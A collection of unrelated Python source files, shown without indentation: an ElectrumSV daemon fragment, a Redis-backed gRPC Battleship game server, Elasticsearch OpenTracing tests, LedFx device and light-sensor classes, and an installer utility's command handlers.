def start_wallet(self, parent_wallet: ParentWallet) -> None:
self.wallets[parent_wallet.get_storage_path()] = parent_wallet
parent_wallet.start(self.network)
def stop_wallet_at_path(self, path: str) -> None:
# Issue #659 wallet may already be stopped.
if path in self.wallets:
parent_wallet = self.wallets.pop(path)
parent_wallet.stop()
def stop_wallets(self):
for path in list(self.wallets.keys()):
self.stop_wallet_at_path(path)
def run_cmdline(self, config_options: dict) -> Any:
password = config_options.get('password')
new_password = config_options.get('new_password')
config = SimpleConfig(config_options)
cmdname = config.get('cmd')
cmd = known_commands[cmdname]
if cmd.requires_wallet:
path = config.get_wallet_path()
parent_wallet = self.wallets.get(path)
if parent_wallet is None:
return {'error': 'Wallet "%s" is not loaded. Use "electrum-sv daemon load_wallet"'
% os.path.basename(path)}
else:
parent_wallet = None
# arguments passed to function
args = [config.get(x) for x in cmd.params]
# decode json arguments
args = [json_decode(i) for i in args]
# options
kwargs = {}
for x in cmd.options:
kwargs[x] = (config_options.get(x) if x in ['password', 'new_password']
else config.get(x))
cmd_runner = Commands(config, parent_wallet, self.network)
func = getattr(cmd_runner, cmd.name)
result = func(*args, **kwargs)
return result
def run(self) -> None:
while self.is_running():
self.server.handle_request() if self.server else time.sleep(0.1)
logger.warning("no longer running")
if self.network:
logger.warning("wait for network shutdown")
self.fx_task.cancel()
app_state.async_.spawn_and_wait(self.network.shutdown_wait)
self.on_stop()
def stop(self) -> None:
logger.warning("stopping")
super().stop()
self.stop_wallets()
remove_lockfile(get_lockfile(self.config))
|
server.py
|
import backoff
import grpc
import logging
import queue
import redis
import threading
import time
import uuid
import log
from server.app.battleships_pb2 import Attack, Response, Status
from server.app.battleships_pb2_grpc import BattleshipsServicer
from server.app.game import Game
from server.app.message import Message
logger = log.get_logger(__name__)
logger.setLevel(logging.DEBUG)
class Battleship(BattleshipsServicer):
def __init__(self, redis_host, redis_port='6379', db=0):
"""Create a Battleship (server) instance.
:param redis_host: Hostname of Redis instance
:param redis_port: Port of Redis instance
:param db: Database to use within Redis instance
:raise ConnectionError: if connection to Redis fails
"""
logger.info('Starting Battleship. Connect to Redis '
f'at {redis_host}:{redis_port}.')
self.__r = redis.Redis(host=redis_host, port=redis_port, db=db)
if not self.ping_redis():
raise ConnectionError('Unable to connect to Redis server!')
else:
logger.info('Battleship server connected to Redis server.')
def Game(self, request_iterator, context):
"""This method is the implementation of the gRPC Game service.
When connected, this provides the main functionality of the
Battleship game.
:param request_iterator: iterator providing gRPC requests
:param context: a gRPC context object
:return: A generator providing gRPC responses
"""
server = _Server(self.__r)
with server:
yield from server.start(request_iterator, context)
def ping_redis(self):
"""Ping a Redis instance to see whether it's alive.
:return: True if connection to instance established, False otherwise
"""
@backoff.on_exception(backoff.expo,
redis.exceptions.ConnectionError,
max_time=60)
def __ping_redis():
"""Convenience function that does the actual Redis PING.
"""
logger.info('Pinging Redis server...')
return self.__r.ping()
try:
return __ping_redis()
except redis.exceptions.ConnectionError:
logger.error('Problem pinging Redis. Retry?')
return False
class _Server:
OpenGames = 'openGames'
def __init__(self, _redis):
self.__r = _redis
self.__q = queue.Queue()
self.__e = threading.Event()
self.__e.set()
self.__stream = None
self.__context = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
def start(self, request_iterator, context):
"""Method that starts the actual server.
:param request_iterator: iterator that provides message
:param context: gRPC context object
"""
self.__stream = request_iterator
self.__context = context
while True:
request = self.recv()
if request is not None:
break
if not request.HasField('join'):
logger.error('Not a join message!')
return
player_id = request.join.id
if player_id == '':
logger.error('Player message ID is empty')
return
logger.info(f'Player {player_id} is attempting to join')
game, is_new = self.find_game_or_create()
logger.info(f'Connecting to game {game.id}. '
f'New? {"Yes" if is_new else "No"}')
logger.info('Setting up server to start receiving PubSub messages')
pubsub_thread = self.subscribe_redis(game, player_id)
if not self.connect_game(game, player_id, is_new):
logger.error('Unable to connect to a game!')
return
game_thread = self.subscribe_grpc(game, player_id)
yield from self.get()
logger.info('Stopping all threads')
game_thread.join()
pubsub_thread.stop()
self.close_open_game(game)
def stop(self):
"""Stop the game from running.
"""
self.__e.clear()
def connect_game(self, game, player_id, is_new):
"""Join an existing game or advertise this one as open if game
is not yet in progress.
:param game: Game
:param player_id: ID of player
:param is_new: True if game is new, False otherwise
"""
if is_new:
return self.add_open_game(game)
if not self.ensure_subscribers(game, 2):
return False
msg = Message(Message.BEGIN, player_id, '')
self.publish(game.id, msg)
return True
def recv(self):
"""Receive a gRPC message.
:return: gRPC message that was received
"""
try:
return next(self.__stream)
except grpc.RpcError:
logger.error('An RPC error occurred!')
self.stop()
except StopIteration:
logger.warning('recv() - iteration stopped')
self.stop()
def send(self, response):
"""Send a gRPC message.
:param response: Response to send to the client
"""
self.__q.put_nowait(response)
def get(self):
"""Get next message from the queue. It keeps running until it
sees that the is_running flag is False, then it returns.
:return: Next message in queue
"""
while self.is_running:
try:
yield self.__q.get(timeout=0.5)
except queue.Empty:
pass
@property
def is_running(self):
"""Is the game still running?
:return: True if running, False otherwise
"""
return self.__e.is_set()
def close(self):
"""Close connections, like the connection to the Redis instance.
"""
self.__r.close()
def subscribe_grpc(self, game, player_id):
"""Create a thread that handles incoming gRPC requests.
:param game: Game to handle requests for
:param player_id: Player this game server is handling
:return: Thread handling the gRPC requests
"""
game_thread = threading.Thread(
target=lambda: self.handle_grpc(game, player_id))
game_thread.daemon = True
game_thread.start()
return game_thread
def handle_grpc(self, game, player_id):
"""Handle actual gRPC requests.
:param game: Game to handle
:param player_id: Id of player this game server is handling
"""
while True:
request = self.recv()
if request is None:
return
if request.HasField('move'):
vector = request.move.vector
logger.info(f'({player_id}) - gRPC - {{Attack}} - '
f'{vector}')
# It must be my move if we have to handle an Attack
if game.my_turn:
msg = Message(Message.ATTACK, player_id, vector)
self.publish(game.id, msg)
else:
logger.error(f'({player_id}) - gRPC - '
'Got {Attack} request but not my turn!')
elif request.HasField('report'):
state = request.report.state
logger.info(f'({player_id}) - gRPC - {{Report}} - {state}. '
f'My Turn? {"Yes" if game.my_turn else "No"}.')
# It must not be my move if we have to handle a Report
if not game.my_turn:
if state == Status.State.DEFEAT:
msg = Message(Message.LOST, player_id, '')
else:
msg = Message(Message.STATUS, player_id, str(state))
self.publish(game.id, msg)
else:
logger.error(f'({player_id}) - gRPC - '
'Got {Report} request but my turn!')
else:
logger.error('Received an unknown message type!')
@property
def redis_conn(self):
"""Return Redis client as a property.
"""
return self.__r
def publish(self, channel, message):
"""Publish a message to Redis PubSub on a certain channel.
:param channel: Channel to use
:param message: Message to publish
"""
self.__r.publish(channel, message.dumps())
def subscribe_redis(self, game, player_id):
"""Subscribe to game.id channel but in a separate thread.
The handler that is used for the pubsub message is called
handle_pubsub, which is a method of this class.
:param game: Game of which the ID is used to subscribe
:param player_id: ID of player this game server is handling
:return: Thread that the handler is running in
"""
def get_pubsub_handler():
def handle_pubsub(msg):
return self.handle_pubsub(msg, game, player_id)
return handle_pubsub
logger.info(f'Subscribing to channel {game.id}')
p = self.__r.pubsub(ignore_subscribe_messages=True)
p.subscribe(**{game.id: get_pubsub_handler()})
thread = p.run_in_thread(sleep_time=0.001)
return thread
def handle_pubsub(self, msg, game, player_id):
"""Handle published messages from Redis PubSub.
:param msg: PubSub message to handle
:param game: Game for which to handle messages
:param player_id: Player for which we're receiving messages
"""
message = Message.recreate(msg['data'])
message_type = message.type
if message_type == Message.BEGIN:
response = Response(turn=Response.State.BEGIN)
self.send(response)
if message.player == player_id:
# Stop this player's turn (this will start other player's turn)
message = Message(Message.STOP_TURN, player_id, '')
self.publish(game.id, message)
elif message_type == Message.STOP_TURN:
logger.info(f'({player_id}) - pubsub - '
f'Received STOP_TURN from player {message.player}')
if message.player == player_id:
logger.info(f'({player_id}) - '
f'Ending turn for player {player_id}')
game.end_turn()
turn = Response.State.STOP_TURN
else:
logger.info(f'({player_id}) - '
f'Starting turn for player {player_id}')
game.start_turn()
turn = Response.State.START_TURN
self.send(Response(turn=turn))
elif message_type == Message.ATTACK:
logger.info(f'({player_id}) - pubsub - '
f'Received ATTACK from player {message.player} '
f'with vector {message.data}.')
if message.player != player_id:
self.send(Response(move=Attack(vector=message.data)))
elif message_type == Message.STATUS:
states = {
'0': ('MISS', Status.State.MISS),
'1': ('HIT', Status.State.HIT),
'2': ('DEFEAT', Status.State.DEFEAT),
}
state = states[message.data][0]
logger.info(f'({player_id}) - pubsub - '
f'Received STATUS from player {message.player} with '
f'state {state}.')
if message.player != player_id:
state = states[message.data][1]
self.send(Response(report=Status(state=state)))
# Stop this player's turn (this will start other
# player's turn). Because the status comes from the
# other player, it means that this player is the one who
# attacked and hence whose turn it was).
message = Message(Message.STOP_TURN, player_id, '')
self.publish(game.id, message)
elif message_type == Message.LOST:
logger.info(f'({player_id}) - pubsub - '
f'Received LOST from player {message.player}.')
turn = Response.State.LOSE
if message.player != player_id:
turn = Response.State.WIN
self.send(Response(turn=turn))
self.stop()
def ensure_subscribers(self, game, n):
"""Ensure that {n} listeners are subscribed to the id of the
game passed in as a parameter.
:param game: Game of which the ID is checked
:param n: The number of subscribers we're expecting
"""
for x in range(5):
values = self.__r.pubsub_numsub(game.id)
if len(values) < 1:
return False
_, nsub = values[0]
if n == nsub:
return True
time.sleep(0.1)
logger.error(f'Timeout trying to ensure {n} subscribers')
return False
def find_game_or_create(self):
"""Try to find an open game in Redis or create a new game if
none found.
:return: A tuple containing a Game object and a flag is_new
which indicates that a new game was created.
"""
b_game_id = self.__r.rpop(self.OpenGames)
# b_game_id is None if no open game found
is_new = b_game_id is None
if is_new:
logger.info('Could not find open game, creating new one')
game_id = str(uuid.uuid4())
else:
game_id = b_game_id.decode('utf-8')
return Game(game_id), is_new
def add_open_game(self, game):
"""Add an open game to the Redis instance so it can be discovered.
:param game: Game to be advertised
:return: True if successful, False otherwise
"""
logger.info(f'Adding open game {game.id}')
return self.__r.lpush(self.OpenGames, game.id)
def close_open_game(self, game):
"""Remove an open game from the Redis instance so it can no longer
be discovered.
:param game: Game to be closed
"""
logger.info(f'Closing open game {game.id}')
return self.__r.lrem(self.OpenGames, 1, game.id)
|
test_lowlevel.py
|
import datetime
import unittest
import threading
from opentracing.mocktracer import MockTracer
from mock import patch
from elasticsearch import Elasticsearch
from elasticsearch_opentracing import TracingTransport, init_tracing, \
enable_tracing, disable_tracing, set_active_span, get_active_span, _clear_tracing_state
from .dummies import *
@patch('elasticsearch.Transport.perform_request')
class TestTracing(unittest.TestCase):
def setUp(self):
self.tracer = MockTracer()
self.es = Elasticsearch(transport_class=TracingTransport)
def tearDown(self):
_clear_tracing_state()
self.tracer.reset()
def test_tracing(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False, prefix='Prod007')
mock_perform_req.return_value = {'hits': []}
enable_tracing()
with self.tracer.start_active_span('parentSpan') as scope:
main_span = scope.span
body = {"any": "data", "timestamp": datetime.datetime.now()}
res = self.es.index(index='test-index', doc_type='tweet', id=1,
body=body, params={'refresh': True})
self.assertEqual(mock_perform_req.return_value, res)
spans = self.tracer.finished_spans()
self.assertEqual(2, len(spans))
es_span = spans[0]
self.assertEqual(es_span.operation_name, 'Prod007/test-index/tweet/1')
self.assertEqual(es_span.parent_id, main_span.context.span_id)
self.assertEqual(es_span.tags, {
'component': 'elasticsearch-py',
'db.type': 'elasticsearch',
'db.statement': body,
'span.kind': 'client',
'elasticsearch.url': '/test-index/tweet/1',
'elasticsearch.method': 'PUT',
'elasticsearch.params': {'refresh': True},
})
def test_trace_none(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
self.es.get(index='test-index', doc_type='tweet', id=3)
self.assertEqual(0, len(self.tracer.finished_spans()))
def test_trace_all_requests(self, mock_perform_req):
init_tracing(self.tracer)
for i in range(3):
self.es.get(index='test-index', doc_type='tweet', id=i)
spans = self.tracer.finished_spans()
self.assertEqual(3, len(spans))
enable_tracing()
disable_tracing() # Shouldnt prevent further tracing
self.es.get(index='test-index', doc_type='tweet', id=4)
spans = self.tracer.finished_spans()
self.assertEqual(4, len(spans))
self.assertTrue(all((lambda x: x.parent_id is None, spans)))
def test_trace_all_requests_span(self, mock_perform_req):
init_tracing(self.tracer)
main_span = self.tracer.start_span()
set_active_span(main_span)
for i in range(3):
self.es.get(index='test-index', doc_type='tweet', id=i)
spans = self.tracer.finished_spans()
self.assertEqual(3, len(spans))
self.assertTrue(all(map(lambda x: x.parent_id == main_span.context.span_id, spans)))
def test_trace_bool_payload(self, mock_perform_req):
init_tracing(self.tracer)
# Some operations, as creating an index, return a bool value.
mock_perform_req.return_value = False
mapping = "{'properties': {'body': {}}}"
res = self.es.indices.create('test-index', body=mapping)
self.assertFalse(res)
spans = self.tracer.finished_spans()
self.assertEqual(1, len(spans))
def test_trace_result_tags(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
mock_perform_req.return_value = {
'found': False,
'timed_out': True,
'took': 7
}
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
spans = self.tracer.finished_spans()
self.assertEqual(1, len(spans))
self.assertEqual('False', spans[0].tags['elasticsearch.found'])
self.assertEqual('True', spans[0].tags['elasticsearch.timed_out'])
self.assertEqual('7', spans[0].tags['elasticsearch.took'])
def test_disable_tracing(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
enable_tracing()
disable_tracing()
self.assertEqual(0, len(self.tracer.finished_spans()))
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(0, len(self.tracer.finished_spans()))
disable_tracing() # shouldn't cause a problem
def test_disable_tracing_span_legacy(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
main_span = self.tracer.start_span()
set_active_span(main_span)
# Make sure the active span was preserved
enable_tracing()
disable_tracing()
self.assertEqual(main_span, get_active_span())
# Make sure it was preserved, by tracing.
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(1, len(self.tracer.finished_spans()))
self.assertEqual(main_span.context.span_id, self.tracer.finished_spans()[0].parent_id)
def test_disable_tracing_span(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
with self.tracer.start_active_span('parentSpan') as scope:
main_span = scope.span
enable_tracing()
disable_tracing()
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(2, len(self.tracer.finished_spans()))
self.assertEqual(main_span.context.span_id, self.tracer.finished_spans()[0].parent_id)
def test_trace_error(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
with self.tracer.start_active_span('parentSpan') as scope:
main_span = scope.span
enable_tracing()
mock_perform_req.side_effect = RuntimeError()
caught_exc = None
try:
self.es.get(index='test-index', doc_type='tweet', id=1)
except RuntimeError as exc:
caught_exc = exc
spans = self.tracer.finished_spans()
self.assertEqual(2, len(spans))
span = spans[0]
self.assertEqual(main_span.context.span_id, span.parent_id)
self.assertEqual(True, span.tags['error'])
self.assertEqual(caught_exc, span.tags['error.object'])
def test_trace_after_error(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
enable_tracing()
mock_perform_req.side_effect = RuntimeError()
caught_exc = None
try:
self.es.get(index='test-index', doc_type='tweet', id=1)
except RuntimeError as exc:
caught_exc = exc
mock_perform_req.side_effect = None
self.es.get(index='test-index', doc_type='tweet', id=1)
spans = self.tracer.finished_spans()
self.assertEqual(2, len(spans))
error_span, span = spans
self.assertEqual(True, error_span.tags['error'])
self.assertEqual(caught_exc, error_span.tags['error.object'])
self.assertNotIn('error', span.tags)
def test_multithreading(self, mock_perform_req):
init_tracing(self.tracer)
ev = threading.Event()
# 1. Start tracing from thread-1; make thread-2 wait
# 2. Trace something from thread-2, make thread-1 before finishing.
# 3. Check the spans got different parents, and are in the expected order.
def target1():
with self.tracer.start_active_span('parentSpan'):
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
ev.set()
ev.wait()
disable_tracing()
def target2():
ev.wait()
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=2)
ev.set()
disable_tracing()
t1 = threading.Thread(target=target1)
t2 = threading.Thread(target=target2)
t1.start()
t2.start()
t1.join()
t2.join()
spans = self.tracer.finished_spans()
self.assertEqual(3, len(spans))
self.assertEqual([False, True, True], [s.parent_id is None for s in spans])
|
__init__.py
|
from ledfx.utils import BaseRegistry, RegistryLoader
from abc import abstractmethod
from threading import Thread
from ledfx.events import DeviceUpdateEvent, Event
import voluptuous as vol
import numpy as np
import importlib
import pkgutil
import logging
import time
import os
import re
_LOGGER = logging.getLogger(__name__)
@BaseRegistry.no_registration
class Device(BaseRegistry):
CONFIG_SCHEMA = vol.Schema({
vol.Required('name', description='Friendly name for the device'): str,
vol.Optional('max_brightness', description='Max brightness for the device', default=1.0): vol.All(vol.Coerce(float), vol.Range(min=0, max=1)),
vol.Optional('center_offset', description='Number of pixels from the preceived center of the device', default=0): int,
vol.Optional('refresh_rate', description='Rate that pixels are sent to the device', default=60): int,
vol.Optional('force_refresh', description='Force the device to always refresh', default=False): bool,
vol.Optional('preview_only', description='Preview the pixels without updating the device', default=False): bool
})
_active = False
_output_thread = None
_active_effect = None
def __init__(self, ledfx, config):
self._ledfx = ledfx
self._config = config
def __del__(self):
if self._active:
self.deactivate()
@property
def pixel_count(self):
pass
def set_effect(self, effect, start_pixel = None, end_pixel = None):
if self._active_effect != None:
self._active_effect.deactivate()
self._active_effect = effect
self._active_effect.activate(self.pixel_count)
#self._active_effect.setDirtyCallback(self.process_active_effect)
if not self._active:
self.activate()
def clear_effect(self):
if self._active_effect != None:
self._active_effect.deactivate()
self._active_effect = None
if self._active:
# Clear all the pixel data before deactiving the device
assembled_frame = np.zeros((self.pixel_count, 3))
self.flush(assembled_frame)
self._ledfx.events.fire_event(DeviceUpdateEvent(
self.id, assembled_frame))
self.deactivate()
@property
def active_effect(self):
return self._active_effect
def process_active_effect(self):
# Assemble the frame if necessary, if nothing changed just sleep
assembled_frame = self.assemble_frame()
if assembled_frame is not None:
if not self._config['preview_only']:
self.flush(assembled_frame)
def trigger_device_update_event():
self._ledfx.events.fire_event(DeviceUpdateEvent(
self.id, assembled_frame))
self._ledfx.loop.call_soon_threadsafe(trigger_device_update_event)
def thread_function(self):
# TODO: Evaluate switching over to asyncio with UV loop optimization
# instead of spinning a seperate thread.
sleep_interval = 1 / self._config['refresh_rate']
if self._active:
self._ledfx.loop.call_later(sleep_interval, self.thread_function)
self.process_active_effect()
# while self._active:
# start_time = time.time()
# self.process_active_effect()
# # Calculate the time to sleep accounting for potential heavy
# # frame assembly operations
# time_to_sleep = sleep_interval - (time.time() - start_time)
# if time_to_sleep > 0:
# time.sleep(time_to_sleep)
# _LOGGER.info("Output device thread terminated.")
def assemble_frame(self):
"""
Assembles the frame to be flushed. Currently this will just return
the active channels pixels, but will eventaully handle things like
merging multiple segments segments and alpha blending channels
"""
frame = None
if self._active_effect._dirty:
frame = np.clip(self._active_effect.pixels * self._config['max_brightness'], 0, 255)
if self._config['center_offset']:
frame = np.roll(frame, self._config['center_offset'], axis = 0)
self._active_effect._dirty = self._config['force_refresh']
return frame
def activate(self):
self._active = True
#self._device_thread = Thread(target = self.thread_function)
#self._device_thread.start()
self._device_thread = None
self.thread_function()
def deactivate(self):
self._active = False
if self._device_thread:
self._device_thread.join()
self._device_thread = None
@abstractmethod
def flush(self, data):
"""
Flushes the provided data to the device. This abstract medthod must be
overwritten by the device implementation.
"""
@property
def name(self):
return self._config['name']
@property
def max_brightness(self):
return self._config['max_brightness'] * 256
@property
def refresh_rate(self):
return self._config['refresh_rate']
class Devices(RegistryLoader):
"""Thin wrapper around the device registry that manages devices"""
PACKAGE_NAME = 'ledfx.devices'
def __init__(self, ledfx):
super().__init__(ledfx, Device, self.PACKAGE_NAME)
def cleanup_effects(e):
self.clear_all_effects()
self._ledfx.events.add_listener(
cleanup_effects, Event.LEDFX_SHUTDOWN)
def create_from_config(self, config):
for device in config:
_LOGGER.info("Loading device from config: {}".format(device))
self._ledfx.devices.create(
id = device['id'],
type = device['type'],
config = device['config'],
ledfx = self._ledfx)
if 'effect' in device:
effect = self._ledfx.effects.create(
ledfx = self._ledfx,
type = device['effect']['type'],
config = device['effect']['config'])
self._ledfx.devices.get_device(device['id']).set_effect(effect)
def clear_all_effects(self):
for device in self.values():
device.clear_effect()
def get_device(self, device_id):
for device in self.values():
if device_id == device.id:
return device
return None
|
generic_light_sensor.py
|
from abc import abstractmethod, ABC
from threading import Thread
from time import sleep
BRIGHTNESS_MOV_AVE_SAMPLES = 20 # number of samples used in the moving average for the brightness (response time [s] ~ samples_number*sample_interval)
BRIGHTNESS_SAMPLE_INTERVAL = 0.5 # period in s for the brightness sampling with the sensor
class GenericLightSensor(ABC):
def __init__(self, app):
self.app = app
self._is_running = False
self._check_interval = BRIGHTNESS_SAMPLE_INTERVAL
self._history = []
def start(self):
"""Starts the light sensor
When the light sensor is started, will control the brightness of the LEDs automatically. Will change it according to the last given color (can only dim)"""
self._is_running = True
self._th = Thread(target = self._thf)
self._th.name = "light_sensor"
self._th.start()
def stop(self):
"""Stops the light sensor from controlling the LED strip"""
self._is_running = False
self._history = []
self.app.lmanager.set_brightness(1)
def _thf(self):
while self._is_running:
sleep(self._check_interval)
brightness = self.get_brightness()
if len(self._history) == BRIGHTNESS_MOV_AVE_SAMPLES:
self._history.pop(0)
self._history.append(brightness)
brightness = sum(self._history)/float(len(self._history))
self.app.logger.info("Averaged brightness: {}".format(brightness)) # FIXME remove this
self.app.lmanager.set_brightness(brightness)
def deinit(self):
"""Deinitializes the sensor hw"""
pass
@abstractmethod
def get_brightness(self):
"""Returns the actual level of brightness to use"""
@abstractmethod
def is_connected(self):
"""Returns true if the sensor is connected correctly"""
|
instlMisc.py
|
#!/usr/bin/env python3.9
import shlex
import threading
from collections import namedtuple
from .instlInstanceBase import InstlInstanceBase
from . import connectionBase
from pybatch import *
import utils
import psutil
# noinspection PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences
class InstlMisc(InstlInstanceBase):
def __init__(self, initial_vars, command) -> None:
super().__init__(initial_vars)
# noinspection PyUnresolvedReferences
self.read_defaults_file(super().__thisclass__.__name__)
self.curr_progress = 0
self.total_progress = 0
self.progress_staccato_command = False
self.progress_staccato_period = 1
self.progress_staccato_count = 0
def get_default_out_file(self):
pass
def do_command(self):
self.no_numbers_progress = bool(config_vars.get("__NO_NUMBERS_PROGRESS__", "False"))
# if var does not exist default is 0, meaning not to display dynamic progress
self.curr_progress = int(config_vars.get("__START_DYNAMIC_PROGRESS__", "0"))
self.total_progress = int(config_vars.get("__TOTAL_DYNAMIC_PROGRESS__", "0"))
self.progress_staccato_period = int(config_vars["PROGRESS_STACCATO_PERIOD"])
self.progress_staccato_count = 0
do_command_func = getattr(self, "do_" + self.fixed_command)
before_time = time.perf_counter()
do_command_func()
after_time = time.perf_counter()
if bool(config_vars["PRINT_COMMAND_TIME"]):
log.info(f"""{self.the_command} time: {round(after_time - before_time, 4)} sec.""")
def dynamic_progress(self, msg):
if self.total_progress > 0:
self.progress_staccato_count = (self.progress_staccato_count + 1) % self.progress_staccato_period
self.curr_progress += 1
if not self.progress_staccato_command or self.progress_staccato_count == 0:
log.info(f"Progress: {self.curr_progress} of {self.total_progress}; {msg}")
elif self.no_numbers_progress:
log.info(f"Progress: ... of ...; {msg}")
def do_version(self):
config_vars["PRINT_COMMAND_TIME"] = "no" # do not print time report
print(self.get_version_str())
def do_help(self):
import help.helpHelper
config_vars["PRINT_COMMAND_TIME"] = "no" # do not print time report
help_folder_path = config_vars["__INSTL_DATA_FOLDER__"].Path(resolve=True).joinpath("help")
help.helpHelper.do_help(config_vars["__HELP_SUBJECT__"].str(), help_folder_path, self)
def do_parallel_run(self):
processes_list_file = config_vars["__MAIN_INPUT_FILE__"].Path(resolve=True)
ParallelRun(processes_list_file, shell=False)()
def do_wtar(self):
what_to_work_on = config_vars["__MAIN_INPUT_FILE__"].Path(resolve=True)
if not what_to_work_on.exists():
log.error(f"""{what_to_work_on} does not exists""")
return
where_to_put_wtar = config_vars["__MAIN_OUT_FILE__"].Path(resolve=True)
Wtar(what_to_wtar=what_to_work_on, where_to_put_wtar=where_to_put_wtar)()
def do_unwtar(self):
self.no_artifacts = bool(config_vars["__NO_WTAR_ARTIFACTS__"])
what_to_work_on = config_vars.get("__MAIN_INPUT_FILE__", os.curdir).Path()
where_to_unwtar = config_vars.get("__MAIN_OUT_FILE__", None).Path()
Unwtar(what_to_work_on, where_to_unwtar, self.no_artifacts)()
self.dynamic_progress(f"unwtar {utils.original_name_from_wtar_name(what_to_work_on.name)}")
def do_check_checksum(self):
self.progress_staccato_command = True
info_map_file = os.fspath(config_vars["__MAIN_INPUT_FILE__"])
CheckDownloadFolderChecksum(info_map_file, print_report=True, raise_on_bad_checksum=True)()
def do_test_import(self):
import importlib
bad_modules = list()
for module in ("yaml", "appdirs", "configVar", "utils", "svnTree", "aYaml"):
try:
importlib.import_module(module)
except ImportError:
bad_modules.append(module)
if len(bad_modules) > 0:
log.error(f"""missing modules {bad_modules}""")
sys.exit(17)
def do_translate_url(self):
url_to_translate = os.fspath(config_vars["__MAIN_INPUT_FILE__"])
translated_url = connectionBase.connection_factory(config_vars).translate_url(url_to_translate)
print(translated_url)
def do_ls(self):
main_folder_to_list = config_vars["__MAIN_INPUT_FILE__"].Path()
folders_to_list = []
if config_vars.defined("__LIMIT_COMMAND_TO__"):
limit_list = list(config_vars["__LIMIT_COMMAND_TO__"])
for limit in limit_list:
limit = utils.unquoteme(limit)
folders_to_list.append(main_folder_to_list.joinpath(limit))
else:
folders_to_list.append(main_folder_to_list)
ls_format = str(config_vars.get("LS_FORMAT", '*'))
out_file = config_vars.get("__MAIN_OUT_FILE__", None).Path(resolve=True)
for fold in folders_to_list:
Ls(fold, out_file=out_file, ls_format=ls_format, out_file_append=True)()
def do_fail(self):
sleep_before_fail = int(config_vars.get("__FAIL_SLEEP_TIME__", "0") )
log.error(f"""Sleeping for {sleep_before_fail} seconds""")
time.sleep(sleep_before_fail)
exit_code = int(config_vars.get("__FAIL_EXIT_CODE__", "1") )
log.error(f"""Failing on purpose with exit code {exit_code}""")
sys.exit(exit_code)
def do_checksum(self):
path_to_checksum = os.fspath(config_vars["__MAIN_INPUT_FILE__"])
ignore_files = list(config_vars.get("WTAR_IGNORE_FILES", []))
checksums_dict = utils.get_recursive_checksums(path_to_checksum, ignore=ignore_files)
total_checksum = checksums_dict.pop('total_checksum', "Unknown total checksum")
path_and_checksum_list = [(path, checksum) for path, checksum in sorted(checksums_dict.items())]
width_list, align_list = utils.max_widths(path_and_checksum_list)
col_formats = utils.gen_col_format(width_list, align_list)
for p_and_c in path_and_checksum_list:
print(col_formats[len(p_and_c)].format(*p_and_c))
print()
print(col_formats[2].format("total checksum", total_checksum))
def do_resolve(self):
config_files = config_vars.get("__CONFIG_FILE__", []).list()
input_file = config_vars["__MAIN_INPUT_FILE__"].Path(resolve=True)
output_file = config_vars.get("__MAIN_OUT_FILE__", None).Path(resolve=True)
config_vars["PRINT_COMMAND_TIME"] = "no" # do not print time report
ResolveConfigVarsInFile(input_file, output_file, config_files=config_files)()
def do_exec(self):
try:
py_file_path = config_vars["__MAIN_INPUT_FILE__"].Path(resolve=True)
config_files = None
if "__CONFIG_FILE__" in config_vars:
config_files = [Path(config_file) for config_file in config_vars["__CONFIG_FILE__"].list()]
for conf_file in config_files:
self.read_yaml_file(conf_file)
with Exec(py_file_path, config_files, reuse_db=False, own_progress_count=0, report_own_progress=False) as exec_le:
exec_le()
except Exception as ex:
log.error(f"""Exception while exec {py_file_path}, {ex}""")
if bool(config_vars.get("EXIT_ON_EXEC_EXCEPTION", False)):
raise
def do_wzip(self):
what_to_work_on = config_vars["__MAIN_INPUT_FILE__"].Path(resolve=True)
if not what_to_work_on.exists():
log.error(f"""{what_to_work_on} does not exists""")
return
where_to_put_wzip = config_vars.get("__MAIN_OUT_FILE__", None).Path(resolve=True)
Wzip(what_to_work_on, where_to_put_wzip)()
def setup_abort_file_monitoring(self):
def start_abort_file_thread(abort_file_path, time_to_sleep, exit_code):
""" Open a thread to wtach the abort file
"""
def abort_file_thread_func(_abort_file_path, _time_to_sleep, _exit_code):
_abort_file_path = Path(_abort_file_path)
while _abort_file_path.is_file():
time.sleep(_time_to_sleep)
log.info(f"aborting because abort file not found {_abort_file_path}")
current_process = psutil.Process()
childern = current_process.children(recursive=True)
for child in childern:
child.kill()
os._exit(_exit_code) # to kill the main thread see: https://docs.python.org/3.6/library/os.html#os._exit
thread_name = "abort file monitor"
x = threading.Thread(target=abort_file_thread_func, args=(abort_file_path, time_to_sleep, exit_code), daemon=True, name=thread_name)
x.start()
if 'ABORT_FILE' in config_vars:
abort_file_path = config_vars["ABORT_FILE"].Path(resolve=True)
log.info(f"watching abort file {abort_file_path}")
start_abort_file_thread(abort_file_path=abort_file_path, time_to_sleep=1, exit_code=0)
def do_run_process(self):
""" run list of processes as specified in the input file
input file can have two kinds of processes:
1. command line, e.g. ls /etc
2. echo statement, e.g. echo "a message"
each line can also be followed by ">" or ">>" and path to a file, in which case
output from the process or echo will go to that file. ">" will open the file in "w" mode, ">>" in "a" mode.
if --abort-file argument is passed to run-process, the fiel specified will be watch and if and when it does not exist
current running subprocess will be aborted and next processes will not be launched.
"""
self.setup_abort_file_monitoring()
list_of_argv = list()
if "__MAIN_INPUT_FILE__" in config_vars: # read commands from a file
file_with_commands = config_vars["__MAIN_INPUT_FILE__"]
with utils.utf8_open_for_read(file_with_commands, "r") as rfd:
for line in rfd.readlines():
list_of_argv.append(shlex.split(line))
else: # read a command from argv
list_of_argv.append(config_vars["RUN_PROCESS_ARGUMENTS"].list())
